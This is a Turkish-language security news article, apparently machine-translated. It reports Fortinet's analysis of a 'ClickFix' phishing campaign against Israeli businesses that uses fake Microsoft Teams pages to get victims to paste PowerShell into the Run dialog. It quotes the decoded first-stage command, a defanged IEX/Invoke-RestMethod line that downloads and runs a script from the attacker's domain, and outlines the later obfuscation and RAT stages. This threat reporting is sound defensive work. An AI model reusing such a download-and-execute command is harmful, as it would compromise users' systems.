Sofistike yeni bir saldırı kampanyası, İsrail işletmelerini ve altyapı sektörlerini, kullanıcıları Windows sistemlerinde kötü niyetli PowerShell komutları yürütmeye yönlendiren “ClickFix” olarak bilinen aldatıcı bir sosyal mühendislik tekniği ile hedeflemeyi hedeflemiştir.
Çok aşamalı saldırı zinciri, savaş zamanı tıbbi malzemeleri ele alma konusundaki eğitici web seminerlerine davet olarak gizlenen kimlik avı e-postaları ile başlar ve tehdit aktörlerinin sosyal mühendislik etkinliklerini artırmak için mevcut bölgesel gerilimleri nasıl kullandıklarını gösterir.
.webp)
Saldırı, kurbanlar kimlik avı e -postalarındaki gömülü bağlantıları tıkladığında başlayan ve bunları taklit edilen Microsoft Teams sayfalarına yönlendirdiğinde başlayan özenle düzenlenmiş bir dizi ile çalışır.
Bu sahte açılış sayfaları, kullanıcılara belirli bir eylem dizisi gerçekleştirmelerini söyler: Çalıştırma iletişim kutusunu açmak için Windows+R tuşuna basın, CTRL+V kullanarak kopyalanan bir dizeyi yapıştırma ve meşru bir doğrulama işlemi gibi görünen şeyleri yürütmek için Enter tuşuna basın.
Bununla birlikte, bu dizi aslında enfeksiyon zincirini başlatan kötü niyetli bir PowerShell komutunun yürütülmesini tetikler.
Fortinet analistleri, bu hedeflenen saldırı kampanyasını FortiMail çalışma alanı güvenlik ekibi aracılığıyla belirledi ve tüm saldırının harici yürütülebilir ürünler gerektirmeden sadece PowerShell infazına dayandığını ortaya koydu.
Araştırmacılar, geleneksel çamurlu su operasyonlarından önemli taktiksel farklılıklar nedeniyle atıfta bulaşma sonuçsuz kalmasına rağmen, çamurlu su kampanyası taktikleriyle potansiyel örtüşmelerle birlikte yanal hareket ve gözetim etkinliğinin kanıtlarını keşfettiler.
İlk yük, kimlik avı sitesinin HTML kodu içindeki üç ipte gizlenmiş bir Base64 kodlu PowerShell komutu içerir.
Birleştirildikten ve kod çözüldükten sonra aşağıdaki komutu üretir:-
powershell IEX ((Invoke-RestMethod -Uri hxxps[:]//pharmacynod[.]com/Fix -Method GET)[.]note[.]body)Bu komut, saldırganın altyapısından ikincil bir PowerShell betiğinin alınmasını ve yürütülmesini başlatarak hedef sistemin tamamen uzlaşmasının temelini oluşturur.
Çok aşamalı gizleme ve yük teslimatı
Saldırı, gelişmiş teknik yetenekleri gösteren sofistike gizleme teknikleri kullanıyor.
İlk yük yürütmesinden sonra, kötü amaçlı yazılım iki kritik dosya indirir: Test.html, özel etiket işaretleyicileri arasında ikili verilere sahip bir blob nesnesi ve son kötü niyetli yükü yeniden yapılandıran ikincil PowerShell betiği.
.webp)
Komut dosyası, sınırlayıcı “Kendrick” ile ayrılmış ikili kodlu parçaları bölen benzersiz bir kod çözme mekanizması kullanır, bunları ikiliden ASCII karakterlerine dönüştürür ve sonucu yürütülebilir PowerShell koduna yeniden birleştirir.
Son aşama, PowerShell aracılığıyla tamamen bir uzaktan erişim Truva atını konuşlandırır ve PharmacyNod’daki komut ve kontrol sunucusu ile kalıcı iletişim kurar[.]com.
Kötü amaçlı yazılım, GZIP sıkıştırma, Base64 kodlama, dize tersine çevirme ve meşru kullanıcı ajanı dizeleri dahil olmak üzere birden fazla gizli tekniği uygularken, tehlikeye atılan sistemlerde sürekli gözetim özelliklerini korur.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın